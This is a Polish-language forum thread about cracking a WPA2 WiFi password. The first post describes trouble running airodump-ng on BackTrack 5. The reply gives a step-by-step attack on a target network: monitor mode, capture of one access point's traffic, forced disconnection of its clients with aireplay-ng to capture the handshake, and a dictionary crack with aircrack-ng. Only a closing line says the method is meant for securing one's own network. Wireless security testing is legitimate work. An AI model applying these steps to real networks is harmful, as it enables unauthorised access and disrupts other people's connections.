Problem z airodump-ng przy probie odzyskania hasla WEP

luppo19

Użytkownik
Dołączył
Czerwiec 4, 2012
Posty
5
Problem z airodump-ng przy probie odzyskania hasla WPA2

Witam od kilku dni próbuje zlamac haslo wlasnej sieci ;) opisze krok po kroku co robie:

Posiadam Back Track 5 PL próby powtarzam na Live CD jak i na zainstalowanym na dysku
karta WiFI USB Linksys WUSB54GC v1 (srebrna)
otwieram terminal
airmon-ng
wypisuje (Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
nastepnie airmon-ng start wlan2
wypisuje (Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
(monitor mode enabled on mon0)

airmon-ng
(Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
(Interface:mon0, Chipset:Ralink 2573, Driver rt73usb)
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
wyp. Current MAC: 00:22:6b:7c:9e (unknow)
Faked MAC 00:11:22:33:44:55 (Cimsys Inc)

ifconfig mon0 up
airodump-ng mon0

caly czas przeszukuje i nie mozna wpisac kolejnej komendy
 
Ostatnia edycja:

shian

Użytkownik
Dołączył
Sierpień 11, 2012
Posty
1
Witam od kilku dni próbuje zlamac haslo wlasnej sieci ;) opisze krok po kroku co robie:

Posiadam Back Track 5 PL próby powtarzam na Live CD jak i na zainstalowanym na dysku
karta WiFI USB Linksys WUSB54GC v1 (srebrna)
otwieram terminal
airmon-ng
wypisuje (Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
nastepnie airmon-ng start wlan2
wypisuje (Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
(monitor mode enabled on mon0)

airmon-ng
(Interface:wlan2, Chipset:Ralink 2573, Driver rt73usb)
(Interface:mon0, Chipset:Ralink 2573, Driver rt73usb)
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
wyp. Current MAC: 00:22:6b:7c:9e (unknow)
Faked MAC 00:11:22:33:44:55 (Cimsys Inc)

ifconfig mon0 up
airodump-ng mon0

caly czas przeszukuje i nie mozna wpisac kolejnej komendy

sprubój

airmon-ng
airmon-ng stop nasz_interface (airmon-ng stop wlan2)
airmon-ng start nasz_interface nasz_kanał (airmon-ng start wlan2 1 )
airodump-ng mon0 (po tej komendzie wyświetli ci sieci ... )

a potem to już bajka :) wybierasz sieć i atakujesz...

airodump-ng -c kanał_sieci_atakowanej -w naszdump --bssid sieci_atakowanej --encrypt WPA2 lub WPA mon0
przykład:
airodump-ng -c 3 -w naszdump --bssid 00:11:22:33:44:55 --encrypt WPA mon0
po tej komendzie jest nasłuch danej sieci oraz zapis do naszdump przechwyconych pakietów.

Żeby przechwycić handshake, potrzebni są użytkownicy. Możesz czekać aż przyjdzie kolejny, lub któryś z aktualnych zresetuje swoje połączenie. Jak nie chcesz czekać to jest komenda rozłanczająca :) w drugim oknie

aireplay-ng -0 1 –a tutaj_BSSID –c tutaj_station_mac mon0
Przykład:
aireplay-ng -0 10 –a 00:11:22:33:44:55 –c 00:22:6b:7c:9e mon0

najczęściej przy 15min zbierania pakietów i wywaleniu klienta mamy przechwycony handshake ale warto sprawdzić:

aircrack-ng –c naszdump-01.cap
Jeśli będzie tam WPA ( 1 handshake ) to zamykasz konsole i zaczynasz szukać hasła metodą słownikową :)

aircrack-ng naszdump-01.cap –w nazwa_słownia.txt

czas znalezienia jest uzależniony od wielkości słownika oraz tego czy przykładowe hasło jest w nim :)
słowniki są dostępne w necie wystarczy poprosić wujka google a on ci pomorze.
oczywiście to co pisze ma pomóc w analizie bezpieczeństwa w swojej sieci oraz ma w zrozumieniu jak taki atak wygląda po to tylko by się aktywnie bronić.
 
Do góry Bottom